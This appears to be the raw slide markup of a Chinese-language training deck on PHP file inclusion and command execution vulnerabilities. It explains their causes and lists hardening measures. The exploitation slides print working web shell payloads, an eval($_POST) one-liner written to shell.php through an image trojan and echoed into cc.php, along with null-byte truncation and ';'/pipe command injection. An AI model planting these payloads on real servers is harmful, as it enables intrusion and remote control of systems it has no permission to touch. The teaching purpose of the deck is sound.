                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>（一）</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>00</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>截断包含</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"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cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>新建</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>1.jpg:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>&lt;?fputs(fopen("shell.php","w"),"&lt;?php eval($_POST[tzc]);?&gt;")?&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>这样的话比如上传一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>1.jpg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>图片码，则访问</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" i="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://www.xxx.com/1.jpg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>时，访问的是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>1.jgp.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>，以为没有这个文件所以报错。这是，可以尝试访问</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" i="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://www.xxx.com/1.jpg%00</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" i="1"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cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>（二）使用长目录截断</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"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C16D278-9888-4E25-966D-42CCD6E15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821" y="1746230"/>
            <a:ext cx="3104762" cy="68571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54A4084-5B76-4568-8986-61F55BABC3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821" y="4368999"/>
            <a:ext cx="4200000" cy="1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40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00F00-04E2-4F23-AE51-4C7EF3E7F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文件包含漏洞加固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584FEE-674B-4913-831D-0025ED6EE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fld id="{5DD3DB80-B894-403A-B48E-6FDC1A72010E}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="120000"/>
                </a:lnSpc>
              </a:pPr>
              <a:t>16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9BB2F0A-865D-4E70-80B9-46EBF6DC0AE5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="708699" y="1370266"/>
            <a:ext cx="2031325" cy="396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>
                <a:solidFill>
                  <a:srgbClr val="555555"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>文件包含漏洞修复</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1" i="0">
              <a:solidFill>
                <a:srgbClr val="555555"/>
              </a:solidFill>
              <a:effectLst/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BE2AF6-346B-469A-978F-51D571B9C304}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="669924" y="1739598"/>
            <a:ext cx="9632920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555555"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>对用户输入检查 ，防止文件包含漏洞</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:solidFill>
                <a:srgbClr val="555555"/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555555"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>开启</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:srgbClr val="555555"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>open_basedir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="555555"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>函数，将其设置为指定目录，则只有该目录的文件允许被访问。</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="555555"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>关闭</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:srgbClr val="555555"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>allow_url_include</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="555555"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>函数，防止远程文件包含。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:solidFill>
                <a:srgbClr val="555555"/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555555"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>对用户输入进行判断</a:t>
            </a:r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6716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025D0-AAD3-4613-9DAB-D2481FBE8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命令执行漏洞 产生原因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41277C-5E85-4A59-A988-8188EE987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565378-5A60-4264-A0EE-2C0EFCAA5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96" y="1861802"/>
            <a:ext cx="6285714" cy="443809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D211CF0-51AD-4EC5-8800-3297C6E8A9DD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="669924" y="1358020"/>
            <a:ext cx="633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对用户输入没有判断，所以产生命令执行漏洞</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1850662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12600-0881-4CCF-A898-63883FD29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命令执行漏洞 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>调用外部程序函数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774750-1B2D-42E0-9B1F-ABE869E95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510A9A-BDF0-4F7E-A5B2-A444FA587701}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="669924" y="1361213"/>
            <a:ext cx="4259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2F2F2F"/>
                </a:solidFill>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:srgbClr val="2F2F2F"/>
                </a:solidFill>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>PHP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="2F2F2F"/>
                </a:solidFill>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>中可以调用外部程序的常见函数：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C9F3BC0-7BF0-4B37-AC2A-6C7A2C61029C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="669924" y="183661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2F2F2F"/>
                </a:solidFill>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>• system</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:srgbClr val="2F2F2F"/>
                </a:solidFill>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>• exec</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:srgbClr val="2F2F2F"/>
                </a:solidFill>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>• shell_exec</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:srgbClr val="2F2F2F"/>
                </a:solidFill>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>• passthru</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:srgbClr val="2F2F2F"/>
                </a:solidFill>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>• popen</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:srgbClr val="2F2F2F"/>
                </a:solidFill>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>• proc_popen</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="0" i="0">
              <a:solidFill>
                <a:srgbClr val="2F2F2F"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="-apple-system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943887-E206-4B97-A4D7-3A70E6069C75}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="669924" y="3697007"/>
            <a:ext cx="5610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2F2F2F"/>
                </a:solidFill>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="2F2F2F"/>
                </a:solidFill>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>导致命令执行漏洞的原因较多，主要包括以下几类：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A12C090-27B3-4F69-8B25-62725B30D098}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="669924" y="4214186"/>
            <a:ext cx="2199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2F2F2F"/>
                </a:solidFill>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>• </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="2F2F2F"/>
                </a:solidFill>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>代码层过滤不严格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C86F1E-CC8C-459A-8A93-449CC924C224}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="669924" y="4647621"/>
            <a:ext cx="3815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2F2F2F"/>
                </a:solidFill>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>• </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="2F2F2F"/>
                </a:solidFill>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>调用第三方组件存在代码执行漏洞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8F7DF4-3325-4597-88A7-C80DBA438CBD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="777165" y="5127455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2F2F2F"/>
                </a:solidFill>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>典型的漏洞代码</a:t>
            </a:r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38571A9-A485-4DDF-8EB9-4CC5D400D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392" y="5199242"/>
            <a:ext cx="3800000" cy="141904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18BC6F4-61D3-4446-AC84-3920B420D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205" y="5382656"/>
            <a:ext cx="4914286" cy="1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508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E057E-A97F-4FDD-B824-281D162DC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命令执行实例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BE3FAC-BD44-48AC-9B63-7EF011E19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6E2096A-30BC-40CA-B0AB-0607EA704231}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="814812" y="1439501"/>
            <a:ext cx="946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线上靶场</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://cohux.com:7012/commandexec/example1.php?ip=127.0.0.1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9262795-D17B-4091-919E-BD36DDE62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812" y="2115166"/>
            <a:ext cx="8228571" cy="12666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7AC1FBD-AD17-411D-BE03-37B29CBE7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207" y="4089329"/>
            <a:ext cx="6793386" cy="263215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C9793E0-7770-42CF-AAF7-24E9AEF73D60}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="814812" y="3534769"/>
            <a:ext cx="8373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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>添加后续命令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DD87972-3806-4D37-ACEB-21AC15F7EB94}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="814812" y="1754545"/>
            <a:ext cx="702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 使用管道符</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3227307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04323" y="2226731"/>
            <a:ext cx="7584213" cy="65679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b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本章内容</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0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759466" y="2931700"/>
            <a:ext cx="8312921" cy="1848529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>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>1.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>文件包含漏洞产生原理</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"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>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>2.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>文件包含漏洞利用</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"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>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>3.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Metasploit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>利用文件包含漏洞</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"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>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>3.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>文件包含防御</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"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>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>4.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>命令执行漏洞产生原理</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"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>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>5.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>命令执行漏洞利用</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"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>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>6.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>命令执行漏洞加固</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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7F051-B226-410F-B85B-7ACA53DC6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命令执行实例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C7E257-B77A-4958-8523-08A2F6D84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3C4D25-0A95-4BF4-BFB8-2EB5CE801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1334059"/>
            <a:ext cx="10066667" cy="2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273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DE060-B61E-4591-8360-44775CDFD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命令执行 写</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>shell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5704AC-7FBB-487D-BF0A-EB5D16F4D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F3B5BF-F2AE-46C2-A4E2-493DEF0B246F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="669924" y="1431032"/>
            <a:ext cx="5330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echo "&lt;?php @eval($_POST['密码']);?&gt;"  &gt; cc.php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CD7976F-FF36-494A-9EE3-52BB773EC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3851373"/>
            <a:ext cx="6390476" cy="120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5805268-65A4-4FFB-8E74-B7FF581F5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4" y="2184613"/>
            <a:ext cx="10687862" cy="111084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95429DF-24F1-45CD-B19E-AADBC1C7816D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="669924" y="5439905"/>
            <a:ext cx="9310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这个时候直接连接一句话就行了</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3037170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0E7A9-6BEC-4B68-ADDC-699D2A1AD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命令执行加固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C80A66-C646-4358-95E8-D31FC0111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7E39CFB-39A4-4E35-905F-7A798CB683CA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="669924" y="1518834"/>
            <a:ext cx="97294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严格控制用户输入参数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escapeshellarg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>处理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 i="1"/>
              <a:t>过滤恶意字符</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" i="1"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>参数的值尽量使用引号包裹，并在拼接前调用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>addslashes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>进行转义</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" i="1"/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917F7B-7287-4878-B6D0-1BC6DF69A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512" y="3732190"/>
            <a:ext cx="6380952" cy="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836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700" b="0">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>thanks</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2700" b="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5235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文件包含漏洞如何产生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fld id="{5DD3DB80-B894-403A-B48E-6FDC1A72010E}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="120000"/>
                </a:lnSpc>
              </a:pPr>
              <a:t>3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96C7A62-8BAC-411B-88E9-BFA2F54D2913}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="669924" y="1316907"/>
            <a:ext cx="6096000" cy="17257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555555"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>PHP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="555555"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>文件包含漏洞的产生原因是在通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:srgbClr val="555555"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>PHP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="555555"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>的函数引入文件时，由于传入的文件名没有经过合理的校验，从而操作了预想之外的文件，就可能导致意外的文件泄露甚至恶意的代码注入。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:solidFill>
                <a:srgbClr val="555555"/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555555"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>例如</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:solidFill>
                <a:srgbClr val="555555"/>
              </a:solidFill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0EB6715-7EC6-4934-ADB6-8269E1BAD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912" y="2862392"/>
            <a:ext cx="7314286" cy="131428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6846ACA-320F-442A-B838-6951D283DB1E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="754912" y="4318503"/>
            <a:ext cx="7384153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cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>上面代码解释，请求包含那个页面就会显示哪个页面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18CAC56-66C7-40D0-9E9A-7F4B4E41D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4" y="4967022"/>
            <a:ext cx="10094614" cy="77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05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5458E1-5114-4EC7-81FF-3BC6A3CC4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常见文件包含函数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266C5C-8424-48D9-8D1D-ACAFCEC59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fld id="{5DD3DB80-B894-403A-B48E-6FDC1A72010E}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="120000"/>
                </a:lnSpc>
              </a:pPr>
              <a:t>4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A947062-236B-4C7D-9583-FC51366E9675}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="669923" y="1420154"/>
            <a:ext cx="9297941" cy="1725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555555"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>include()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="555555"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>：执行到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:srgbClr val="555555"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>include</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="555555"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>时才包含文件，找不到被包含文件时只会产生警告，脚本将继续执行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555555"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>require()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="555555"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>：只要程序一运行就包含文件，找不到被包含的文件时会产生致命错误，并停止脚本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555555"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>include_once()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="555555"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1">
                <a:solidFill>
                  <a:srgbClr val="555555"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>require_once()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="555555"/>
